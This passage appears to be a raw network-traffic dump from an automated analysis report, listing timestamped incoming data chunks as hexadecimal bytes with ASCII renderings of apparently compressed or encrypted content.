                                                                                    2022-05-10 20:11:05 UTC51INData Raw: c5 00 8d f1 8b d9 21 be ee 64 59 37 ee e2 89 75 4c 9b ca 77 0c 96 92 45 85 e4 03 60 7b 50 81 78 80 3c e1 32 c8 71 0c 54 0b a2 99 ce e0 2c 21 f6 80 b6 19 52 34 2d 8d 1d 98 d7 52 7a 62 c0 e2 0f 9c c4 bf d3 70 58 e6 ec 8d 8a d7 0c cd 79 21 db 49 2b e7 6a dd b6 90 52 9b 6e 87 21 b3 45 29 58 00 f7 39 e1 c7 85 cb 3a ff f4 0c 6d 4c 6b 05 27 99 f3 44 4f ed 68 e3 3a 89 f4 64 1c 3d 8d 08 c2 f3 bd a7 4a 15 7b 02 d5 b1 82 ef da 64 dc 0e f4 e8 07 3e 58 c3 76 60 6d 57 39 52 9e 34 f9 b8 77 d0 46 88 b9 0d f0 17 d4 79 57 6f f8 06 80 5f 19 2f 01 88 9f fc 87 b0 7d d7 67 fb a0 45 4f 86 53 c4 2a 7c fe c3 71 08 bf 3e 8f 24 fd 61 c7 8a 94 69 14 52 13 b1 76 be a7 2d 56 57 9b 84 9e dd e1 c1 73 36 18 89 c9 60 34 8f 54 b9 6e 17 00 b4 36 0b 1f 64 12 f4 f6 00 dc 09 83 cf cd bf 89 5e
                                                                                    Data Ascii: !dY7uLwE`{Px<2qT,!R4-RzbpXy!I+jRn!E)X9:mLk'DOh:d=J{d>Xv`mW9R4wFyWo_/}gEOS*|q>$aiRv-VWs6`4Tn6d^
                                                                                    2022-05-10 20:11:05 UTC52INData Raw: fc f9 64 4c d1 b4 4b bd f4 2c 63 cc a2 3e e0 6e 2a a2 f2 c2 d5 a5 0a 0d 36 1a 49 99 0e d3 a8 f0 fe 45 ce 3e 40 be fa 35 92 8a 71 c0 0d 9f d8 23 e8 8b 64 ae 07 17 24 b1 ce 45 b1 83 f9 18 e8 8e 10 c8 2c f4 39 d4 2b 1a 71 12 0c 75 c6 97 d4 94 8c f7 b9 84 25 0c 75 29 eb 77 16 65 db ee 6b e7 54 a2 37 aa 12 8a a3 52 37 74 f5 c4 99 b3 ee db 9c 50 f7 0b 80 28 7d 01 06 6f e1 66 15 48 e5 ee 99 7a 1b 78 56 99 fb 18 6e 32 38 60 1f 37 db 4d 1d 51 af 98 07 18 82 ae af 5f 8a 91 8a ce 30 38 7e 48 3a f3 f9 a2 19 d4 60 a8 95 fa cb fb 57 e3 a4 d2 71 5b df 9f 07 f6 7c 18 59 92 ba 25 ad 96 46 89 ae 2d 91 4c a3 e3 f8 5f cf 14 09 b5 12 f5 a3 b9 92 70 85 fc 33 5b c7 05 cc ed b8 57 99 63 11 8c e8 0c aa d9 21 0a 28 9e af c1 91 f3 35 1d 0a da 99 0d e4 70 ab 62 63 ba 45 7e d9 4b a4
                                                                                    Data Ascii: dLK,c>n*6IE>@5q#d$E,9+qu%u)wekT7R7tP(}ofHzxVn28`7MQ_08~H:`Wq[|Y%F-L_p3[Wc!(5pbcE~K
                                                                                    2022-05-10 20:11:05 UTC53INData Raw: 78 ab 7a 9b 9a c0 12 0c 4d 93 43 9e e9 3c 5e 66 0d 8b 06 11 2b 37 2b e8 45 11 43 0a 96 06 37 e4 43 ee e3 96 94 48 60 36 f9 ec f4 92 3c 51 7c 77 df e5 2d f3 0a bc d9 60 ad a1 ca 8f 8c c0 17 d9 56 a4 fc 4b 2d 8e e6 d7 a7 9e 11 8c 7d 81 36 a7 67 eb 8b 03 f1 2a 98 c5 c0 ca 3c f3 f2 9c 2a b3 69 05 2b 9d eb 03 cf ec 68 e3 16 be 22 98 e2 e3 9d 31 50 86 86 ad 25 32 55 0e c2 94 c4 c5 df 4c 31 62 a3 ee 68 a9 84 1d 69 69 60 71 3f 43 91 0f 18 c8 cd d6 53 94 9a 62 c9 17 de 64 13 45 15 2f 87 73 0c 39 29 8e aa fc 8d a4 e7 b8 41 a0 a0 43 5e e3 7a 29 29 c0 f9 ac 5b 1c bf 38 89 35 fb 0e d3 8b 94 63 05 5e 7c 76 76 70 ac 17 9d 7d 65 7b 40 de f0 cb 06 17 18 89 c9 5f 08 9b 5e cd 54 17 00 db 59 5c 0e 72 0b 2d df fa cb df 90 c7 cd b2 87 5d 5b 72 f5 2f 67 48 7d 51 3a 78 06 25 1f
                                                                                    Data Ascii: xzMC<^f+7+EC7CH`6<Q|w-`VK-}6g*<*i+h"1P%2UL1bhii`q?CSbdE/s9)AC^z))[85c^|vvp}e{@_^TY\r-][r/gH}Q:x%
                                                                                    2022-05-10 20:11:05 UTC55INData Raw: 20 d9 7b 00 b3 a1 92 2b a4 26 07 48 89 21 99 04 c0 de ed ed 57 15 2f 52 a1 d6 cb 93 a6 60 b3 2f 9c da 25 fb 83 40 8f 14 05 9e a0 dc 5a 5d 7d f8 34 f7 b6 7f c9 2c f4 26 ce 38 08 71 03 18 6a e1 69 cd b9 83 e6 aa 94 2b 82 d7 16 02 76 0c 65 c4 c7 63 c5 57 b3 65 b2 ec 8b fe 5b 44 df 86 7e 93 b9 fe c2 f0 6c e6 19 95 0a 5b 03 2a 6f dd dc 37 43 f6 f6 b4 6c 0f 6c 91 78 fb 34 65 c4 2d 41 37 06 c8 48 08 59 b8 8c 0c 21 a8 b3 51 54 7b 93 9a ca 18 86 43 48 30 f4 cf 69 08 d4 77 ad e1 39 ca d7 57 91 3f bd c5 50 cc 93 16 ec 7d 16 5e 93 a8 00 91 97 6a 83 ae 29 97 db 2a f6 e2 3f e0 06 09 ae 28 33 82 47 95 4d 8d c5 1f 4a c1 60 ff 80 85 51 86 4a 11 98 c0 0b b9 c6 0f e5 2f 9a 65 d3 99 dd 58 ac 0b dc fc 53 f4 70 ad 66 29 b2 56 7e c2 4a b0 b1 26 e8 2f b6 dd 92 4a 1a 08 ef 3e 29
                                                                                    Data Ascii: {+&H!W/R`/%@Z]}4,&8qji+vecWe[D~l[*o7Cllx4e-A7HY!QT{CH0iw9W?P}^j)*?(3GMJ`QJ/eXSpf)V~J&/J>)
                                                                                    2022-05-10 20:11:05 UTC56INData Raw: 7b 97 64 0d 87 7e 01 74 37 21 c5 73 15 54 0e 85 31 d2 7a 52 fd 99 cc bd 0f 6b 25 f8 ed 7f b1 5b e5 64 ab d9 e4 16 a4 33 66 d3 76 37 df e5 9c 9c 5c 2e d4 7a 4e f9 24 2a e0 7b dd b6 9f 2c ad f6 af 2e a6 4f 07 e7 e5 f6 3f 84 fb 79 c9 63 d5 fd 17 09 49 7a 9f 3b 99 f6 3a 98 77 07 20 00 24 00 83 39 8c 69 19 cc 8c 8a b6 41 05 47 94 ec b5 f3 d4 dc 0b dc 60 a3 e2 16 3f 95 0d 74 93 df 48 32 56 94 21 9b ca cc d0 4c dd 9e 50 d9 1c c5 63 13 7b ef 27 96 65 83 40 c8 c9 ab f6 90 68 12 25 67 a2 aa 56 4a f4 59 d5 3a d7 29 59 67 0f b4 2f 9f 33 2b fb a8 43 94 69 1e 4c c9 de 84 70 a6 27 45 85 e9 a6 9c c8 e7 d2 62 3d 1d e6 01 73 04 80 4e 89 41 06 11 d2 59 23 0c 72 07 e0 df e3 da 66 a7 cd dc bc 87 45 c4 c0 a5 73 9b b7 84 9e 3e 75 22 16 1f 73 4b 8c 4d af 1b 4d 93 90 ea c7 d1 06
                                                                                    Data Ascii: {d~t7!sT1zRk%[d3fv7\.zN$*{,.O?ycIz;:w $9iAG`?tH2V!LPc{'e@h%gVJY:)Yg/3+CiLp'Eb=sNAY#rfEs>u"sKMM
                                                                                    2022-05-10 20:11:05 UTC57INData Raw: 21 99 0e d3 dd f0 19 a8 15 2b 5a be f6 34 89 ba 6f c0 24 9f da 23 9e 8b 5f bf 74 ad 9e b1 c4 4f 6c 3a fb 18 f8 a6 d8 c8 2c fe 11 ce 2f 1a 77 3a b3 77 c6 91 e4 5d 8c f7 ad ad 3e 08 60 2f c3 53 0c 65 d1 f9 58 3d 56 a2 7d 83 35 8a d2 58 24 60 97 7b b1 82 e4 d1 e8 41 fc 78 30 00 a5 08 0d b4 2b 09 28 48 f4 e1 9c 21 1d 73 8d 8b f3 30 8d ef 2c 43 1f e4 d8 4d 11 6a f6 9e 0c 36 a9 aa a6 7d b1 9b 8b c8 18 a1 41 48 3c d1 8c 7a 1a d2 75 b9 f3 ef 23 f8 5d e9 84 54 c6 5a d9 bd 57 ff 6f 10 5c 89 be 35 73 92 46 8f 97 3e 84 41 3f d8 a0 21 f3 12 1a b8 33 04 be bd 94 67 a8 cb 13 5b c1 27 86 82 85 51 95 78 0a a2 ee 18 ab df 3d 33 00 b6 75 c8 87 db 09 db 29 d8 93 7f e5 79 ba 70 1d a5 6c 9b d0 58 a9 bc de c1 24 af cc 92 33 a8 22 50 3a 38 76 a8 d7 d2 f8 72 35 e3 ca 95 7d d1 38
                                                                                    Data Ascii: !+Z4o$#_tOl:,/w:w]>`/SeX=V}5X$`{Ax0+(H!s0,CMj6}AH<zu#]TZWo\5sF>A?!3g['Qx=3u)yplX$3"P:8vr5}8
                                                                                    2022-05-10 20:11:05 UTC58INData Raw: e7 0a 9b 39 c7 6b 7c e8 f6 81 1e 1e 69 22 e7 ef 46 19 d5 52 76 59 db f3 05 be 18 b8 d4 62 1f 70 ed 8d 8a de 8b db 7e 4e fe 58 23 f0 73 c1 bc 85 3b 6b e0 b8 27 a2 4e a3 99 0b e0 23 9f eb 51 d0 2d ff 33 dc 8e 67 6a 05 2c 2a ec 23 9c f9 7c c1 a3 24 0a 91 cb f2 9b 19 c6 95 81 b6 4e 3c cb 0e c4 b5 e8 c4 f2 88 dc 61 a9 f9 01 ee 93 c7 7c 6a 54 67 11 ce 94 27 fe d4 dd f8 aa 83 b2 2f 1e 08 ed 2e 53 7e fb 24 96 70 31 c2 00 c9 a1 70 d8 b2 7d d6 4f 94 a1 45 45 e9 43 c2 3d 16 ec c5 60 18 ae 37 b1 1a 02 9e 38 82 bc f5 14 54 19 bb a8 62 8e 1a 56 83 90 ac b0 ca e1 c7 79 04 20 89 c8 79 da 8a 52 92 6f 17 41 c6 36 0b 0e 72 01 f1 ce f2 dc 09 f9 ce dc ba ec 55 d5 c5 d8 55 99 b7 98 8f 2f 5c 35 22 18 75 22 a7 4f af 63 4b 82 90 87 d9 d2 10 4b 18 b2 de 7c dc 61 2c ca 6c 1f f8 f4
                                                                                    Data Ascii: 9k|i"FRvYbp~NX#s;k'N#Q-3gj,*#|$N<a|jTg'/.S~$p1p}OEEC=`78TbVy yRoA6rUU/\5"u"OcKK|a,l
                                                                                    2022-05-10 20:11:05 UTC60INData Raw: 35 92 f6 6a c0 0d 91 da 23 e8 91 5f ae 06 15 9e b1 ce 19 44 83 f9 25 ff 8e 10 51 2d f4 39 c2 2b 1a 71 12 0a 75 c6 8c fc 91 8c b6 a6 85 25 8c 60 29 fa 04 b6 65 db e5 7b ff 17 a6 77 ad 1f a2 93 56 37 63 8c 77 b1 f1 e0 d1 e4 44 d9 09 8a 06 8d ea 07 69 fc 21 b4 48 e5 ee a7 7b 14 5b 1c 85 fa 1e 46 c2 2e 45 31 28 33 4c 17 48 83 02 0c 30 b0 bd ab 53 7f 68 88 ce 36 6e 6c 4a 3a ff f9 92 1b d4 6c 97 66 c7 cb f1 4e e8 aa 95 52 59 df 93 22 d1 6d 16 49 a9 5f 1c 6f 9c 6e 15 bf 23 8a 52 3c e1 fb 09 dd 16 09 b9 2c 04 8e b9 94 6b 96 2a 16 4a c0 27 f5 80 85 51 8f 41 2c 8a c0 10 bd 27 2a 44 02 b1 61 ce 4c 52 5a a8 0b cb 95 51 d8 72 ab 7f 1a 89 6a 7e d3 52 b9 83 98 9a 21 ad cc 9e 4f 88 31 58 14 7e 7d b9 d9 d2 f4 72 35 e3 ca 94 7d d0 38 0a d4 a6 30 de bd 4d 24 23 6b 57 01 72
                                                                                    Data Ascii: 5j#_D%Q-9+qu%`)e{wV7cwDi!H{[F.E1(3LH0Sh6nlJ:lfNRY"mI_on#R<,k*J'QA,'*DaLRZQrj~R!O1X~}r5}80M$#kWr
                                                                                    2022-05-10 20:11:05 UTC61INData Raw: 59 3a fb 6e b0 c3 ac 7e 2e e6 d6 14 bf 23 4c d3 76 31 dd ea 9c 86 ee f6 dc 7e 48 f4 5a 27 f7 e1 ff 77 96 3d bb 44 a9 25 a2 49 6e f0 03 f7 35 82 fc 83 a4 f5 f9 e5 0c 15 a6 68 02 42 41 fd 2b 82 fa 96 eb 5f 08 3e e8 c1 e1 9b 1f df 8b 97 aa 42 7b 7f 0c c4 b9 e6 d9 cb 60 b2 45 a1 e8 01 25 89 1a 0c 63 47 60 3f 43 99 0f bd cf cd d6 29 a8 b0 25 ce 11 c5 7e e6 79 ff 2c 8d ab 0c 0a 29 fe ab fc 8d a1 73 a4 dd a2 a0 4f 42 cd 6a c4 2a ca 21 fa 60 0f a8 e8 9c 35 ec 70 d6 98 1a de 2b 8c ed 4e 89 61 a0 3a 80 90 9c 95 98 d9 f1 ff f8 d2 e7 76 16 66 21 a2 63 b8 6f 1d 13 d5 45 b1 0e 72 0b fc e6 ca dc 09 89 11 de bc bc 5d ff c5 ca 14 ad b7 82 8f 2f 5d 2e d7 1f 75 24 7b 4f af 1d e9 83 81 85 c6 d0 06 24 e6 b3 de 77 c3 3e 1f c2 3c 08 97 ff f5 12 9a 53 95 26 ae 2f 6a c1 21 42 eb
                                                                                    Data Ascii: Y:n~.#Lv1~HZ'w=D%In5hBA+_>B{`E%cG`?C)%~y,)sOBj*!`5p+Na:vf!coEr]/].u${O$w><S&/j!B
                                                                                    2022-05-10 20:11:05 UTC62INData Raw: 2f 7e 9f b1 c4 2a 5f 82 f9 12 ed 8a 01 cc 04 03 39 d4 2d 17 6e 46 87 5e c6 97 cd 86 8b e6 a0 93 05 ff 60 29 eb eb 1d 62 cc f0 56 4b 46 a5 6f 8b 93 8a d2 52 ab 74 81 67 b9 77 e4 d1 e2 f0 e6 0c 90 1f 9c 9e 17 6e ed 29 ae 48 e5 e4 28 6c 1a 6f ab 5d fa 18 6e 70 3d 42 2a 20 49 4d 17 42 37 8f 0b 2e a5 df 33 44 50 87 82 ee 93 46 42 48 a6 e8 d6 65 10 f4 df bf fa c7 57 ea 5a f0 a7 9d 23 5a df 95 96 ee 68 09 43 9e e4 81 7e 91 59 84 a0 59 1c 50 3e ef f3 01 66 14 09 bf a6 3d a7 a6 9b 7e fc 48 06 5c d8 1f cd 1e 94 50 86 78 14 16 d1 1d b4 cb 3d 87 3f b1 6a d1 87 69 4b af 14 ce 85 e5 e7 77 b4 6c 1a 3d 55 79 cc 4e 8f 52 d8 e9 03 33 dd 9f 43 97 36 cc 2d 2e 60 a1 c9 21 cd 77 2a fc fb 1c 6c d6 57 b2 c7 a1 29 d5 a3 c0 31 0c 76 4d 17 e8 ff 01 67 88 3f e0 9b 28 57 e9 1c 86 38
                                                                                    Data Ascii: /~*_9-nF^`)bVKFoRtgwn)H(lo]np=B* IMB7.3DPFBHeWZ#ZhC~YYP>f=~H\Px=?jiKwl=UyNR3C6-.`!w*lW)1vMg?(W8
                                                                                    2022-05-10 20:11:05 UTC63INData Raw: 0a 90 d1 5d 32 f6 99 72 73 39 01 f6 7e 4e e4 7b 22 e1 17 d4 a7 94 b7 bd 6c 96 54 18 4f 01 82 09 ed b2 95 ed 87 ca 2f e0 f4 1f 14 26 56 05 2d 82 d5 7d 8c ed 6e 86 b3 25 0a 91 41 f2 82 0e b2 ba 86 a7 40 3c 00 0a c4 b9 98 67 db 64 d7 c3 b2 f1 1f 4a b8 1d 63 4f 6d 38 3d 52 92 48 47 ca cd da e4 93 ab 3c b6 2b d4 73 83 45 a7 28 87 73 76 9c 00 c9 a1 5e 96 ab 71 df 74 b3 b6 56 5f dd 8c c6 2a c0 ee d2 60 0e 25 33 86 1d 31 63 c7 8a 9d 06 a0 55 13 bb 65 63 b0 3e 44 bb 2b 86 9e c8 f0 d2 62 3e 82 9a cc 7a 15 8e 3b 0b 6e 17 0a c9 33 78 6a 73 01 fb dd f4 cd 0c ab 95 d8 ba 90 3b 60 c4 ca 5f 8d 49 83 99 d1 5c 3f 17 37 2e 20 a6 49 c0 a8 4a 82 8b 91 2d d1 10 da fd a2 db 5e 9f 3a 1f c4 01 bd 96 ff 78 07 64 52 5a d9 af 4f 6e c4 09 1f f5 5e 7b 8a ac e9 e4 40 9b 74 1b 18 2d c5
                                                                                    Data Ascii: ]2rs9~N{"lTO/&V-}n%A@<gdJcOm8=RHG<+sE(sv^qtV_*`%31cUec>D+b>z;n3xjs;`_I\?7. IJ-^:xdRZOn^{@t-
                                                                                    2022-05-10 20:11:05 UTC65INData Raw: e0 08 f4 39 de 03 35 71 12 00 59 da 88 d0 bd 37 f7 a7 8f 4a 2d 61 29 e1 5f 64 61 db e9 58 f3 57 a2 7d 83 9f 8b d2 58 3b 6c 08 c9 91 3d 53 07 f5 43 fc 78 30 00 a5 08 0d b4 9f 0f 28 48 ec 6a 03 75 93 c4 5d 91 20 0f b8 61 39 45 37 01 c8 49 1e cc 1c 88 3d 1b ac a7 21 e2 40 42 98 d0 23 4c 69 51 2b fd c0 70 13 c5 6c 25 d2 ae cf fb 5b c7 88 bd c5 50 7d 84 00 e8 b9 05 45 90 bd 0c 71 a7 a7 81 31 94 96 70 0e e6 ee 2a fa 9a be ae 3e a2 17 ae 4e 72 9f c7 1b 70 d8 1e df 93 89 5f 88 62 98 a2 aa 1e ab df 03 3f 2e b6 7f 60 80 fe 4d 7e 18 d1 82 75 e1 a6 b8 75 1d ad 55 61 e2 83 dc 5f d9 e9 09 bc c5 89 58 93 01 46 2f 09 47 0b da bd dc 61 14 f4 fb 06 7f c3 46 3b cf b1 2f bc 46 5d 20 01 7a 47 10 65 fa 2e f9 96 29 7a 9c a2 4f f4 3c 07 2c 02 e4 bc f8 b9 89 12 e3 25 0f 30 15 1b
                                                                                    Data Ascii: 95qY7J-a)_daXW}X;l=SCx0(Hju] a9E7I=!@B#LiQ+pl%[P}Eq1p*>Nrp_b?.`M~uuUa_XF/GaF;/F] zGe.)zO<,%0
                                                                                    2022-05-10 20:11:05 UTC65INData Raw: 9f f2 fd 1e 44 cd 45 9d 5b a6 42 7b 3a 7f c7 0f 1a d2 68 c3 ba d6 43 49 c1 9a d2 5a 76 07 9c d6 f9 7e e2 88 be b7 6e d9 b5 c4 65 ea 88 59 83 ef 10 a3 60 75 ba ea 02 5a d9 d5 9b 6f 31 e0 16 83 46 c5 45 94 02 59 e7 c0 e3 49 cf 77 4b 43 64 4c ca a9 7c 8c 22 3f 7e 03 b4 2e f9 38 11 b4 ab 58 c6 b2 21 44 27 0a 32 be 1f f4 ca d7 91 62 17 3e 46 af f8 22 1f 8d 6b c0 0c 8d f8 32 ca 9d 4e b9 8b 28 9e b1 cf e7 55 a1 ed 30 52 8e 10 c2 04 ae 39 d4 21 32 9c 13 0a 7f ee 40 cd 95 86 df 83 85 25 06 0f 01 e9 77 0a 74 cc f8 a6 c4 40 b3 79 bc 9f 8d d2 52 36 76 a0 6f bf a5 f5 c6 6e 53 f7 0b 8b a2 b4 24 12 41 5a 09 28 42 fa c4 38 42 1d 73 8a 90 d2 ad 6e ec 26 69 18 11 d5 5a 9a 45 ab 9e 0d 23 99 bf 8c 43 46 8f 07 f1 30 46 43 ea 2b da c5 52 b6 d4 66 b5 e5 b8 47 c4 5d ef ad ab ed
                                                                                    Data Ascii: DE[B{:hCIZv~neY`uZo1FEYIwKCdL|"?~.8X!D'2b>F"k2N(U0R9!2@%wt@yR6vonS$AZ(B8Bsn&iZE#CF0FC+RfG]
                                                                                    2022-05-10 20:11:05 UTC67INData Raw: 3a e5 3a 0d 12 9b 92 9d 14 35 e3 5e 92 2b e5 70 1f 99 bc 3b 47 68 e0 26 a1 1f 00 7b da d1 a9 9d 90 ae 2c 3e 8d 3f 3f 96 b2 ca df fe 0e 30 88 4a ad f1 6f 5f 70 1b 20 11 77 28 e5 d3 bb 80 cd 19 8f 3a d3 b9 00 20 b4 ec 13 60 ed e7 6c 34 55 15 2d e2 67 25 4f 99 51 83 fd 18 ba 71 1e 81 60 02 9c 3f af 73 50 c4 4c 95 24 39 05 f0 95 65 c9 80 bc 0e 72 33 e4 f2 e0 0d c2 88 6f 60 d9 fe 2e ac 1a b9 c2 7b 20 14 e7 9c 81 52 0e cd 73 59 25 df 4a 7f 6a da b0 42 2e b0 7d 8a 36 b3 7e e3 99 06 79 88 99 37 90 1d b1 c6 e5 06 03 4b 6c 13 3c 8d 73 9c 90 37 7b fb 13 2a 21 c9 f2 e6 8a 17 58 97 82 b6 44 80 8d 18 eb a7 e6 d2 cb 6a cc 64 b2 e6 93 14 7b 1d 63 45 93 71 3d 43 9a b3 2e 55 e6 c0 57 84 a3 2b d9 12 c5 7d 1d 7c fa 3d 89 e1 c3 b1 07 d8 ad ed 89 26 55 3a 66 a2 aa 6d 98 e4 52
                                                                                    Data Ascii: ::5^+p;Gh&{,>??0Jo_p w(: `l4U-g%OQq`?sPL$9er3o`.{ RsY%JjB.}6~y7Kl<s7{*!XDjd{cEq=C.UW+}|=&U:fmR
                                                                                    2022-05-10 20:11:05 UTC68INData Raw: 7f c3 8b 85 e9 6b 4d 07 e9 4e 9e d6 46 77 55 76 07 97 d6 fe 66 fc a8 da 3d d9 f7 f9 d9 64 e0 fc 13 a2 fe 1b 9d 1f 79 b3 62 da 38 bf d5 91 47 bd 7c 2f 88 48 ed 20 92 14 4e 80 d5 6c fe bb 29 8f 43 60 c2 6c 69 61 0b 43 04 73 13 a0 32 db 6f 11 aa dc ab d4 a5 00 1e 32 69 08 98 0e d9 c8 f9 ef 4c 02 51 6c bf f6 3f 83 83 7c af 20 9f da 29 f7 93 d2 85 07 17 9f a2 c4 5b c9 a8 f9 18 ff 9d 15 c1 3d fe 30 5a 9c 32 52 13 0a 7f d7 93 da 84 86 fe 29 32 3b 24 7a 28 eb 7d 1d 61 c5 fe 75 c1 49 8a 6d aa 12 80 c3 5b 26 6f e9 54 98 b3 ee c0 eb 7d f2 64 a1 01 a5 08 17 60 99 27 29 48 ef ef b3 7e 0b 70 05 31 95 37 6f ec 26 56 30 28 cd 4c 17 48 ba 99 63 2b bb ae a5 59 5f 92 55 db 15 6e 75 48 3a f3 c2 71 32 fa 64 bf fc cd e3 c3 5d ef a6 63 c5 5c f5 95 0a be 73 16 4f 81 b7 1d 6f 96
                                                                                    Data Ascii: kMNFwUvf=dyb8G|/H Nl)C`liaCs2o2iLQl?| )[=0Z2R)2;$z(}auIm[&oT}d`')H~p17o&V0(LHc+Y_UnuH:q2d]c\sOo
                                                                                    2022-05-10 20:11:05 UTC69INData Raw: ee f2 65 0a 8b a4 28 e2 b8 39 55 17 21 17 6a d4 ee 8e 11 27 bf fb 3e af 3e 3f 96 47 f2 ff 3a b8 28 5a 55 18 fd b8 d2 45 31 29 3a 64 24 ed c4 ba 8c db 11 01 bd fb ee 7c 20 ac fe 05 71 e0 f4 d2 8b 5d b9 9f ca 7d b1 4f 93 54 fc 56 14 b6 6f 07 fe 97 8d 2b 3d 2d cc 48 7d 41 1b 95 06 a1 e3 43 ee de 17 bf 0f 67 45 0c fa 6e b0 ba 52 7e 71 c0 fb 2d cb 0f bc d5 5e b7 ca ee 8b a4 51 05 dc 78 3d 00 4a 2b eb 14 d7 a5 94 37 b5 44 fa 23 a2 49 29 09 07 f7 39 a6 7a 84 cb 3a 8a 1a 07 02 52 05 05 2f 88 f7 23 a0 92 6c e9 06 0c 88 9f e3 e5 b3 8e cf 86 80 d4 b5 15 57 04 ab bf f5 d4 d0 6c f5 e2 a7 e8 01 1c 00 19 63 43 6d f7 3a 52 92 54 0b ca cd da 29 82 b0 25 c2 1f fc f0 8d 6d f8 04 03 71 19 29 29 4c af fc 81 c1 82 d6 67 a8 cf 45 4d e5 58 cc 02 46 fb c3 77 36 3b 3a 8f 22 d5 e6
                                                                                    Data Ascii: e(9U!j'>>?G:(ZUE1):d$| q]}OTVo+=-H}ACgEnR~q-^Qx=J+7D#I)9z:R/#lWlcCm:RT)%mq))LgEMXFw6;:"
                                                                                    2022-05-10 20:11:05 UTC71INData Raw: d2 e2 76 07 9c aa d0 6d ed a6 c2 a2 67 ce d0 b7 67 e8 82 7e d9 fb 1d 8b 04 1e 92 ee 6d 40 c9 c4 b9 6d 31 cb 01 fd 6d ef 2a 96 04 4e 99 b3 f6 48 c5 44 9e 57 73 9a c8 ab 72 91 e5 39 e7 a5 9f 85 34 96 ff b3 b9 99 03 b6 00 1c 3c 0b 32 a7 50 2d 24 0f f8 6f 15 3e 41 ae f6 35 92 8a 5e c1 c3 9d d8 2f f2 8b 5f af 14 27 98 b1 e2 47 44 83 6f 18 fe 9f 06 db 24 cc 2b d6 2b 1a 71 03 02 6c 38 96 e0 9c 9d f0 b1 9a 32 90 7a 3a e3 77 1d 6d c4 fc 8e d6 7b a8 04 ac 10 8a d8 5e 28 71 95 76 99 a2 ec c9 1c 6d db 00 94 8d 8e 02 06 68 e5 0e 31 5b ed e4 a5 75 02 63 75 87 d6 12 7f ea 3b 93 24 06 c4 5c 04 4a ab 8f 04 2c 44 af 83 5d 46 9f 92 d2 ac 5b 51 40 3a e8 d9 67 e4 d5 4a b6 eb c0 d1 e4 7e 73 b2 ae cd 5a ce 9d 15 e9 91 17 63 8c bf 14 7b f9 4e 8b bf 29 8a 5e 2e e3 f5 21 e2 1c 1e
                                                                                    Data Ascii: vmgg~m@m1m*NHDWsr94<2P-$o>A5^/_'GDo$++ql82z:wm{^(qvmh1[ucu;$\J,D]F[Q@:gJ~sZc{N)^.!
                                                                                    2022-05-10 20:11:05 UTC72INData Raw: 3f d1 de c6 aa 3b b1 bd f6 10 bf 80 3f 9c 93 f5 c8 6a 91 93 50 5d 7d ce 2e d6 4f 1d 08 ae 64 24 e7 c9 a2 a4 f4 11 01 87 c2 04 00 20 be e3 2d 40 e1 ef e8 ae 5a 9d 97 17 e7 25 4f 93 42 fc 61 15 b6 63 1e 89 78 88 03 63 25 c4 66 6f c2 1a 93 28 f2 e0 45 e5 2b fd bd 0f 61 20 e2 ff 01 32 d4 52 7a 66 10 e0 0a a7 0e 84 9f 77 37 ce ff 89 9d c3 10 b3 f7 4f ff 4d 38 e7 53 9d a6 94 37 ac 68 96 22 b5 20 88 89 03 f1 50 16 ed 87 c1 2f fe ed 2e 1c 5b 6a 03 3c 8e d5 0c 88 ed 62 c1 2f 24 0a 91 da 1f 9b 19 cc 97 81 8f 4d 14 57 25 d7 b7 e6 dc e3 88 dd 61 a3 f9 0f 20 ac 85 67 45 43 76 b4 55 94 27 f5 df d9 c4 6e 21 b2 25 c2 03 fc a9 8a 6d f8 3a 0a 72 19 2f 00 dd bf e8 af 11 7d d7 6d 8a 3c 45 4f ef 43 c0 02 ce fe c3 77 0d b6 2f 87 30 d5 f9 c3 8a 92 7f 99 53 13 b1 77 64 b2 39 7e
                                                                                    Data Ascii: ?;?jP]}.Od$ -@Z%OBacxc%fo(E+a 2Rzfw7OM8S7h" P/.[j<b/$MW%a gECvU'n!%m:r/}m<EOCw/0Swd9~
                                                                                    2022-05-10 20:11:05 UTC73INData Raw: df da 44 75 e4 9d 7f bd c9 83 9a 00 6e b6 cc f8 46 d8 d5 0d 52 3d d4 0a b2 98 ed 2a 90 9e 4e 86 c3 ec 69 0a 4e 8f 43 f8 5d d5 a0 6c 9a c2 b0 78 1c bf 28 d5 18 9c b3 bd 91 c4 85 d4 0d 36 1a bd 88 00 cc c9 ef 80 d9 04 30 5f ad e9 6e 0e 9b 65 df 19 81 b8 bf f9 85 40 bb 18 2f 02 a0 c0 5a 52 a3 2c 18 fe 8e 8c d9 22 eb 2e f4 d0 1a 71 12 96 64 c8 88 d4 b5 57 f7 a7 85 b9 1d 6e 36 f2 68 68 f9 ca e1 6f cd 77 04 77 ab 12 16 c3 5c 28 7e 99 35 05 a2 ea ce fe 4c 24 0b 8a 00 39 13 08 76 eb 16 72 d4 f4 ea ab 63 06 ef 9a 88 e5 07 71 bf b0 54 39 0d c4 5d 9a 69 ab 9e 0d 23 b4 bf a1 43 77 00 8b ce 30 da 53 46 2d e6 de e6 0b da 7e a0 92 5b da f5 44 cf 62 bd c5 5a 43 84 04 e5 70 61 d3 90 b9 06 70 d5 da 98 b1 3f 9f 0d a5 e1 f3 3c ec 53 95 ae 34 32 80 40 94 61 80 48 06 55 d8 06
                                                                                    Data Ascii: DunFR=*NiNC]lx(60_ne@/ZR,".qdWn6hhoww\(~5L$9vrcqT9]i#Cw0SF-~[DbZCpap?<S42@aHU
                                                                                    2022-05-10 20:11:05 UTC74INData Raw: 9c 90 e9 29 71 95 2a 48 50 77 ef a2 2c 4e 37 05 16 72 0c f5 c4 aa 86 cc cb 16 5b 76 88 01 20 bf ef 07 76 f7 e8 6c 34 32 c0 9a ca 77 23 c1 24 6b be f8 3e aa 68 0d 84 70 72 2a 1b 33 c6 66 16 43 95 24 41 84 e7 43 e2 f0 0e 0b 21 a5 2c fe fb 67 ac 2b 53 50 73 dd fe 05 bd 17 42 d2 5a 35 e5 ec a6 0f c1 2c dc 7e 55 cf 42 2b 10 7a d7 a7 34 3d bd 7d f4 9d a2 4f 0b 83 1c eb 17 35 ed 87 c1 36 ff cd a7 06 58 6c 2d 93 88 fd 21 fb f4 6a e9 0a 29 03 f4 f9 e1 9b 13 e1 8a ae 05 4e 14 51 26 df bd f7 de dd 4e d4 49 00 ec 07 32 eb 01 61 45 4f 73 35 44 87 2c cc 57 cc d0 46 93 be 34 c3 8d c7 77 98 69 91 31 85 75 13 3c 0f df b8 f1 bf c1 7c d7 67 b3 ae 54 42 7f 41 c2 3b c6 90 4c 70 1e b5 16 2b 20 fd 67 ef 34 94 69 1e 47 16 a0 73 58 97 2d 56 89 a3 c3 9f c8 e1 b2 a9 2d 18 83 db 